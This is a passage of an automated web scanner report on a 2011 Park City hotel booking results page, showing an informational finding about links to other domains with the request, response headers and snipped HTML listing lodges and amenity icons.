php?group_id=982&cloneID=41&catID=103&eventID=1399&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1399]); ><img src="http://s3.amazonaws.com/book_direct_images/l_67e540c507b5b60fdcf171e8120b3276.jpg" title="Condominium Rentals of Park City/Intermountain Lodging"></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1441&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1441]); ><img src="http://s3.amazonaws.com/book_direct_images/l_e4bcd72250ffd5a9ef11c541cd6193a4.jpg" title="The Canyons Sundial Lodge"></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1419&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1419]); ><img src="http://s3.amazonaws.com/book_direct_images/l_181b9155b3a729276978989bd94512f1.jpg" title="Chateau Apres"></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1405&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1405]); ><img src="http://s3.amazonaws.com/book_direct_images/l_a824f4d448a76e7d475537d825245ce5.jpg" title="Park Avenue Reservations"></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1407&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1407]); ><img src="http://s3.amazonaws.com/book_direct_images/l_ac62d92cecf212dfb615b53378f330e6.jpg" title="Park Plaza Condominiums"></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1492&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1492]); ><img src="http://s3.amazonaws.com/book_direct_images/l_4481362da4bc35517e632ff665d87379.jpg" title="Kamas Inn"></a>
...[SNIP]...
</div>
               <a style="display:inline-block;font-size:10px;font-weight:normal;" onclick=" _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Directory Link']); " href="http://www.parkcityinfo.com/visitors/lodging-hotels/">Return to Hotels &amp; Resorts Directory</a>
...[SNIP]...
</div>
               <a style="display:inline-block;font-size:10px;font-weight:normal;" onclick=" _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Directory Link']); " href="http://www.parkcityinfo.com/visitors/lodging-hotels/">Return to Hotels &amp; Resorts Directory</a>
...[SNIP]...
</div>
<iframe src="http://www.parkcityinfo.com/footer_jackrabbit.cfm" width="100%" height="75" frameborder="0" allowtransparency="true" scrolling="no"></iframe>
...[SNIP]...
<div id="page_footer" style="padding-bottom:25px; color:#444; font-size:11px;"><a href="http://www.jackrabbitsystems.com/" target="_blank" style="color:#444; font-size:11px;"><img src="http://www.jackrabbitsystems.com/images/trip_images/powered_by_jackrabbit.png" name="powered_by_img" id="powered_by_img" style="border:none;"></a>
...[SNIP]...

5.2. http://parkcitytrips.com/booking_results.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://parkcitytrips.com
Path:   /booking_results.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /booking_results.php?cloneID=41&rooms=1&nights=1&group_id=982 HTTP/1.1
Host: parkcitytrips.com
Proxy-Connection: keep-alive
Referer: http://parkcitytrips.com/redirect_booking.php?clone_id=41&group_id=982
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SERVERID=i-f3d4a39a; __utmz=1.1297289442.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.570101180.1297289442.1297289442.1297289442.1; __utmc=1; __utmb=1.1.10.1297289442; __utmz=252597768.1297289442.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252597768.924705233.1297289442.1297289442.1297289442.1; __utmb=252597768.2.10.1297289442; __utmc=252597768; __utmv=252597768.|2=Results%20Page=parkcitytrips.com=1,; PHPSESSID=rso1kpo756scrthfhm9htcvdf3

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 22:12:20 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 426021


                   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
                   <html><head>
                   <meta http-equiv="Content-Type" content="text/html; charset=iso-885
...[SNIP]...
</title>
                   <link rel="stylesheet" type="text/css" href="http://www.prod.bookdirect.net/css/smoothness/jquery-ui-1.7.2.custom.css" />
                   
                                       <link rel="stylesheet" type="text/css" href="/css/parkcity_template.css" />
                                       
                   <script src="http://maps.google.com/maps?file=api&amp;v=2.109&amp;key=ABQIAAAAKZm_5hsUqOpv5DxPV4HooBROL83n-bgKgORxim6v55hn_ZaBnxSpV4rEbp2tOu1bjGh1t-gicIUDyw" type="text/javascript"></script>
...[SNIP]...
</div>
<iframe src="http://www.parkcityinfo.com/header_jackrabbit.cfm" width="100%" height="115" frameborder="0" allowtransparency="true" scrolling="no"></iframe>
...[SNIP]...
<div style='border:none; float:left; padding-right:2px; cursor:pointer;height:22px;width:22px;overflow:hidden;'><img id='amenity_image_4' src='http://s3.amazonaws.com/book_direct_images/amenities/8fa9e98acf5e2b247caa70669df6c903.png' title='Parking' alt='Parking' onClick=" _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Filter','Amenities','Parking']); toggle_amenity('4', 'aa5d43508b4cec0724f75af8ae868ca6.png', '8fa9e98acf5e2b247caa70669df6c903.png');ewd_getcontent('v002/dbase/php_ajax/booking_results_count.php', 'results_number_label_map', 1);ewd_getcontent('v002/dbase/php_ajax/pages_top.php', 'pages_top_map', 1);ewd_getcontent('v002/dbase/php_ajax/pages_bottom.php', 'pages_bottom_map', 1);readMap();"></div><div style='border:none; float:left; padding-right:2px; cursor:pointer;height:22px;width:22px;overflow:hidden;'><img id='amenity_image_1' src='http://s3.amazonaws.com/book_direct_images/amenities/1fc82576cbb0bcebaf66b495707dd675.png' title='Shuttle Service' alt='Shuttle Service' onClick=" _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Filter','Amenities','Shuttle Service']); toggle_amenity('1', '4a91a9bdeccb5f084339608bb1039e67.png', '1fc82576cbb0bcebaf66b495707dd675.png');ewd_getcontent('v002/dbase/php_ajax/booking_results_count.php', 'results_number_label_map', 1);ewd_getcontent('v002/dbase/php_ajax/pages_top.php', 'pages_top_map', 1);ewd_getcontent('v002/dbase/php_ajax/pages_bottom.php', 'pages_bottom_map', 1);readMap();"></div><div style='border:none; float:left; padding-right:2px; cursor:pointer;height:22px;width:22px;overflow:hidden;'><img id='amenity_image_31' src='http://s3.amazonaws.com/book_direct_images/amenities/90d28b770896393a5d24deaa76adf104.png' title='Pets Allowed' alt='Pets Allowed' onClick=" _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Filter','Amenities','Pets Allowed']); toggle_amenity('31', '9ce03aac14ae7f31e817e122d6f60bd4.png', '90d28b770896393a5d24deaa76adf104.png');ewd_getcontent('v002/dbase/php_ajax/booking_results_count.php', 'results_number_label_map', 1);ewd_getcontent('v002/dbase/php_ajax/pages_top.php', 'pages_top_map', 1);ewd_getcontent('v002/dbase/php_ajax/pages_bottom.php', 'pages_bottom_map', 1);readMap();"></div><div style='border:none; float:left; padding-right:2px; cursor:pointer;height:22px;width:22px;overflow:hidden;'><img id='amenity_image_6' src='http://s3.amazonaws.com/book_direct_images/amenities/45a53ad2386da6db59cbd753481a4ceb.png' title='Swimming Pool' alt='Swimming Pool' onClick=" _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Filter','Amenities','Swimming Pool']); toggle_amenity('6', '73a521715679621c1f544cd26c6075d0.png', '45a53ad2386da6db59cbd753481a4ceb.png');ewd_getcontent('v002/dbase/php_ajax/booking_results_count.php', 'results_number_label_map', 1);ewd_getcontent('v002/dbase/php_ajax/pages_top.php', 'pages_top_map', 1);ewd_getcontent('v002/dbase/php_ajax/pages_bottom.php', 'pages_bottom_map', 1);readMap();"></div><div style='border:none; float:left; padding-right:2px; cursor:pointer;height:22px;width:22px;overflow:hidden;'><img id='amenity_image_2' src='http://s3.amazonaws.com/book_direct_images/amenities/071c76db840ec89a0ee32b4e813b2f88.png' title='Fitness Room' alt='Fitness Room' onClick=" _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Filter','Amenities','Fitness Room']); toggle_amenity('2', '686566e8aaab6172c31b1f6b470c6e3b.png', '071c76db840ec89a0ee32b4e813b2f88.png');ewd_getcontent('v002/dbase/php_ajax/booking_results_count.php', 'results_number_label_map', 1);ewd_getcontent('v002/dbase/php_ajax/pages_top.php', 'pages_top_map', 1);ewd_getcontent('v002/dbase/php_ajax/pages_bottom.php', 'pages_bottom_map', 1);readMap();"></div><div style='border:none; float:left; padding-right:2px; cursor:pointer;height:22px;width:22px;overflow:hidden;'><img id='amenity_image_7' src='http://s3.amazonaws.com/book_direct_images/amenities/20b34cc2545d9bbfc011472d08597e19.png' title='Restaurants' alt='Restaurants' onClick=" _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Filter','Amenities','Restaurants']); toggle_amenity('7', '042de5248e8fa72df3c87db8fc48345b.png', '20b34cc2545d9bbfc011472d08597e19.png');ewd_getcontent('v002/dbase/php_ajax/booking_results_count.php', 'results_number_label_map', 1);ewd_getcontent('v002/dbase/php_ajax/pages_top.php', 'pages_top_map', 1);ewd_getcontent('v002/dbase/php_ajax/pages_bottom.php', 'pages_bottom_map', 1);readMap();"></div><div style='border:none; float:left; padding-right:2px; cursor:pointer;height:22px;width:22px;overflow:hidden;'><img id='amenity_image_3' src='http://s3.amazonaws.com/book_direct_images/amenities/462fdff39e49769ef18a4e9c44691760.png' title='High Speed Internet' alt='High Speed Internet' onClick=" _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Filter','Amenities','High Speed Internet']); toggle_amenity('3', 'bfa9115d65ee2e68af501bd7cc5ac344.png', '462fdff39e49769ef18a4e9c44691760.png');ewd_getcontent('v002/dbase/php_ajax/booking_results_count.php', 'results_number_label_map', 1);ewd_getcontent('v002/dbase/php_ajax/pages_top.php', 'pages_top_map', 1);ewd_getcontent('v002/dbase/php_ajax/pages_bottom.php', 'pages_bottom_map', 1);readMap();"></div>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1453&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1453]); ><img src="http://s3.amazonaws.com/book_direct_images/l_2a733136b1c01bbb4f6f69765b281ea2.jpg" title="Goldener Hirsch Inn"></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1448&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1448]); ><img src="http://s3.amazonaws.com/book_direct_images/l_f8c01d2b5755a239851e388436ec65b5.jpg" title="The Sky Lodge"></a>
...[SNIP]...
<div class="span" style="overflow:hidden;"><img id='amenity_image_4' src='http://s3.amazonaws.com/book_direct_images/amenities/b01e3128d7a405dbb5031afbb683e066.png' title='Parking' alt='Parking' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_1' src='http://s3.amazonaws.com/book_direct_images/amenities/fa1eb743274c7b7277a04b5073887890.gif' title='Shuttle Service Not Available' alt='Shuttle Service Not Available' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_31' src='http://s3.amazonaws.com/book_direct_images/amenities/a3ebd2775b1683f02ca5a8d1a8ffeaeb.gif' title='Pets Allowed Not Available' alt='Pets Allowed Not Available' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_6' src='http://s3.amazonaws.com/book_direct_images/amenities/b4abfce876e6328d40e7d6da6f13568f.png' title='Swimming Pool' alt='Swimming Pool' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_2' src='http://s3.amazonaws.com/book_direct_images/amenities/1b8a5baafcd13d3e63fc65de26a409b3.png' title='Fitness Room' alt='Fitness Room' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_7' src='http://s3.amazonaws.com/book_direct_images/amenities/926974964bd0f788099ef7af7d523b3a.png' title='Restaurants' alt='Restaurants' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_3' src='http://s3.amazonaws.com/book_direct_images/amenities/d0ee49fa9cbb74e995fe3b7f073ee20f.png' title='High Speed Internet' alt='High Speed Internet' style='height:22px;width:22px;'></div>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1383&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1383]); ><img src="http://s3.amazonaws.com/book_direct_images/l_db4cadf298e14f47a95926c25087606c.jpg" title="Old Town Guest House"></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1431&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1431]); ><img src="http://s3.amazonaws.com/book_direct_images/l_a6a81cccd7ebdf5fb4ea5b8f947bb2ad.jpg" title="Westgate Park City Resort & Spa"></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1422&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1422]); ><img src="http://s3.amazonaws.com/book_direct_images/l_cebc8d2c721ba5f01a90ee609ee781af.jpg" title="The Lodge at the Mountain Village"></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=7369&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',7369]); ><img src="http://s3.amazonaws.com/book_direct_images/l_4479851d723539b1b9aafdc8788733a5.jpg" title="Waldorf Astoria Park City"></a>
...[SNIP]...
<div class="span" style="overflow:hidden;"><img id='amenity_image_4' src='http://s3.amazonaws.com/book_direct_images/amenities/b01e3128d7a405dbb5031afbb683e066.png' title='Parking' alt='Parking' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_1' src='http://s3.amazonaws.com/book_direct_images/amenities/fa1eb743274c7b7277a04b5073887890.gif' title='Shuttle Service Not Available' alt='Shuttle Service Not Available' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_31' src='http://s3.amazonaws.com/book_direct_images/amenities/a3ebd2775b1683f02ca5a8d1a8ffeaeb.gif' title='Pets Allowed Not Available' alt='Pets Allowed Not Available' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_6' src='http://s3.amazonaws.com/book_direct_images/amenities/b4abfce876e6328d40e7d6da6f13568f.png' title='Swimming Pool' alt='Swimming Pool' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_2' src='http://s3.amazonaws.com/book_direct_images/amenities/1b8a5baafcd13d3e63fc65de26a409b3.png' title='Fitness Room' alt='Fitness Room' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_7' src='http://s3.amazonaws.com/book_direct_images/amenities/aa2902cb8eb88e55bbcee78942ebb1d9.gif' title='Restaurants Not Available' alt='Restaurants Not Available' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_3' src='http://s3.amazonaws.com/book_direct_images/amenities/d0ee49fa9cbb74e995fe3b7f073ee20f.png' title='High Speed Internet' alt='High Speed Internet' style='height:22px;width:22px;'></div>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1493&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1493]); ><img src="http://s3.amazonaws.com/book_direct_images/l_92759ea5ad34825356e258a2597880a3.jpg" title="Jupiter Inn"></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1413&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1413]); ><img src="http://s3.amazonaws.com/book_direct_images/l_19a567de699313df4cd2d9f28e2cd33f.jpg" title="Red Pine Condominiums"></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1426&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1426]); ><img src="http://s3.amazonaws.com/book_direct_images/l_a11a7104ddd179b256e77fe3f0c22d0a.jpg" title="Resorts West"></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1429&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1429]); ><img src="http://s3.amazonaws.com/book_direct_images/l_33c801674e73c1e7b542d0c721ca74f6.jpg" title="Stein Eriksen Lodge"></a>
...[SNIP]...
<div class="span" style="overflow:hidden;"><img id='amenity_image_4' src='http://s3.amazonaws.com/book_direct_images/amenities/b01e3128d7a405dbb5031afbb683e066.png' title='Parking' alt='Parking' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_1' src='http://s3.amazonaws.com/book_direct_images/amenities/fa1eb743274c7b7277a04b5073887890.gif' title='Shuttle Service Not Available' alt='Shuttle Service Not Available' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_31' src='http://s3.amazonaws.com/book_direct_images/amenities/a3ebd2775b1683f02ca5a8d1a8ffeaeb.gif' title='Pets Allowed Not Available' alt='Pets Allowed Not Available' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_6' src='http://s3.amazonaws.com/book_direct_images/amenities/e163a21a09f8d8ae26e02bfef7d05023.gif' title='Swimming Pool Not Available' alt='Swimming Pool Not Available' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_2' src='http://s3.amazonaws.com/book_direct_images/amenities/1b8a5baafcd13d3e63fc65de26a409b3.png' title='Fitness Room' alt='Fitness Room' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_7' src='http://s3.amazonaws.com/book_direct_images/amenities/926974964bd0f788099ef7af7d523b3a.png' title='Restaurants' alt='Restaurants' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_3' src='http://s3.amazonaws.com/book_direct_images/amenities/d0ee49fa9cbb74e995fe3b7f073ee20f.png' title='High Speed Internet' alt='High Speed Internet' style='height:22px;width:22px;'></div>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1425&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1425]); ><img src="http://s3.amazonaws.com/book_direct_images/l_01aa0fffb7c2fa5826a2a44d66f28b63.jpg" title="Park City Peaks Hotel"></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1436&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1436]); ><img src="http://s3.amazonaws.com/book_direct_images/l_3ab163ded569043a5ba8d6b7c415bc3e.jpg" title="Marriott MountainSide Resort"></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1511&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1511]); ><img src="http://s3.amazonaws.com/book_direct_images/a44dd9ef324e7532f7e6b786404660e5.jpg" title="24 Daly House"></a>
...[SNIP]...
<div class="span" style="overflow:hidden;"><img id='amenity_image_4' src='http://s3.amazonaws.com/book_direct_images/amenities/57eb7130536632921d0c11351a0a7388.gif' title='Parking Not Available' alt='Parking Not Available' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_1' src='http://s3.amazonaws.com/book_direct_images/amenities/fa1eb743274c7b7277a04b5073887890.gif' title='Shuttle Service Not Available' alt='Shuttle Service Not Available' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_31' src='http://s3.amazonaws.com/book_direct_images/amenities/a3ebd2775b1683f02ca5a8d1a8ffeaeb.gif' title='Pets Allowed Not Available' alt='Pets Allowed Not Available' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_6' src='http://s3.amazonaws.com/book_direct_images/amenities/e163a21a09f8d8ae26e02bfef7d05023.gif' title='Swimming Pool Not Available' alt='Swimming Pool Not Available' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_2' src='http://s3.amazonaws.com/book_direct_images/amenities/540aed1002590a31ae1c73fb8187f68f.gif' title='Fitness Room Not Available' alt='Fitness Room Not Available' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_7' src='http://s3.amazonaws.com/book_direct_images/amenities/aa2902cb8eb88e55bbcee78942ebb1d9.gif' title='Restaurants Not Available' alt='Restaurants Not Available' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_3' src='http://s3.amazonaws.com/book_direct_images/amenities/1560122293a8d9ce4d090a1f6f5f32b2.gif' title='High Speed Internet Not Available' alt='High Speed Internet Not Available' style='height:22px;width:22px;'></div>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1432&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1432]); ><img src="http://s3.amazonaws.com/book_direct_images/l_63a19802a5b81e8243fa8be9beb55177.jpg" title="The Chateaux at Silver Lake"></a>
...[SNIP]...
<div class="span" style="overflow:hidden;"><img id='amenity_image_4' src='http://s3.amazonaws.com/book_direct_images/amenities/b01e3128d7a405dbb5031afbb683e066.png' title='Parking' alt='Parking' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_1' src='http://s3.amazonaws.com/book_direct_images/amenities/fa1eb743274c7b7277a04b5073887890.gif' title='Shuttle Service Not Available' alt='Shuttle Service Not Available' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_31' src='http://s3.amazonaws.com/book_direct_images/amenities/a3ebd2775b1683f02ca5a8d1a8ffeaeb.gif' title='Pets Allowed Not Available' alt='Pets Allowed Not Available' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_6' src='http://s3.amazonaws.com/book_direct_images/amenities/b4abfce876e6328d40e7d6da6f13568f.png' title='Swimming Pool' alt='Swimming Pool' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_2' src='http://s3.amazonaws.com/book_direct_images/amenities/1b8a5baafcd13d3e63fc65de26a409b3.png' title='Fitness Room' alt='Fitness Room' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_7' src='http://s3.amazonaws.com/book_direct_images/amenities/926974964bd0f788099ef7af7d523b3a.png' title='Restaurants' alt='Restaurants' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_3' src='http://s3.amazonaws.com/book_direct_images/amenities/d0ee49fa9cbb74e995fe3b7f073ee20f.png' title='High Speed Internet' alt='High Speed Internet' style='height:22px;width:22px;'></div>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1411&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1411]); ><img src="http://s3.amazonaws.com/book_direct_images/l_bb5ef24549b781ea64501b3093562538.jpg" title="Prospector Square Lodge & Conference Center"></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1455&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1455]); ><img src="http://s3.amazonaws.com/book_direct_images/l_6c7dd3e7c036e97661e0daff81f68ca3.jpg" title="Best Western Landmark Inn"></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=2578&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',2578]); ><img src="http://s3.amazonaws.com/book_direct_images/l_f537c9210f90ac854d7ea860c4ba19e6.jpg" title="Holiday Inn Express Park City"></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1398&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1398]); ><img src="http://s3.amazonaws.com/book_direct_images/l_2c08f84f5f6cebbfafeb79b573924910.jpg" title="Carriage House Condominiums"></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1418&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1418]); ><img src="http://s3.amazonaws.com/book_direct_images/l_71fb7d44c1976326e05d1dc0dbfdb6d6.jpg" title="The Canyons Grand Summit Resort Hotel and Conference Center"></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1400&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1400]); ><img src="http://s3.amazonaws.com/book_direct_images/l_f7ccbd5f451ed855f22e07bb1fc8c679.jpg" title="Crestview Condominiums"></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1577&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1577]); ><img src="http://s3.amazonaws.com/book_direct_images/l_43a53ade52c12c2903c3e190b40abf5c.jpg" title="The Canyons Central Reservations"></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1430&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1430]); ><img src="http://s3.amazonaws.com/book_direct_images/l_a4d89b68f8b48f521b0e56530a06e1a3.jpg" title="Yarrow Resort Hotel and Conference"></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1410&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1410]); ><img src="http://s3.amazonaws.com/book_direct_images/l_e009e83ce65266a1765959dc113c7918.jpg" title="Prospector Accommodations"></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1389&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1389]); ><img src="http://s3.amazonaws.com/book_direct_images/l_014e8136e32c6e08fc4c5c410d3fa4b8.jpg" title="Woodside Inn"></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1388&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1388]); ><img src="http://s3.amazonaws.com/book_direct_images/l_746d79cae7c16597c3ce2a0e220925a3.jpg" title="Washington School Inn"></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1460&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1460]); ><img src="http://s3.amazonaws.com/book_direct_images/l_9f54a69c4c22c52ec9a12cf3a2c66c46.jpg" title="PowderWood Resort"></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1450&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1450]); ><img src="http://s3.amazonaws.com/book_direct_images/l_327869c94f88d9daed4a8f0022a00fe7.jpg" title="The Canyons Silverado Lodge"></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1421&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1421]); ><img src="http://s3.amazonaws.com/book_direct_images/l_6c33a1f00bbb9436e6bd728a9655e7ae.jpg" title="Hotel Park City"></a>
...[SNIP]...
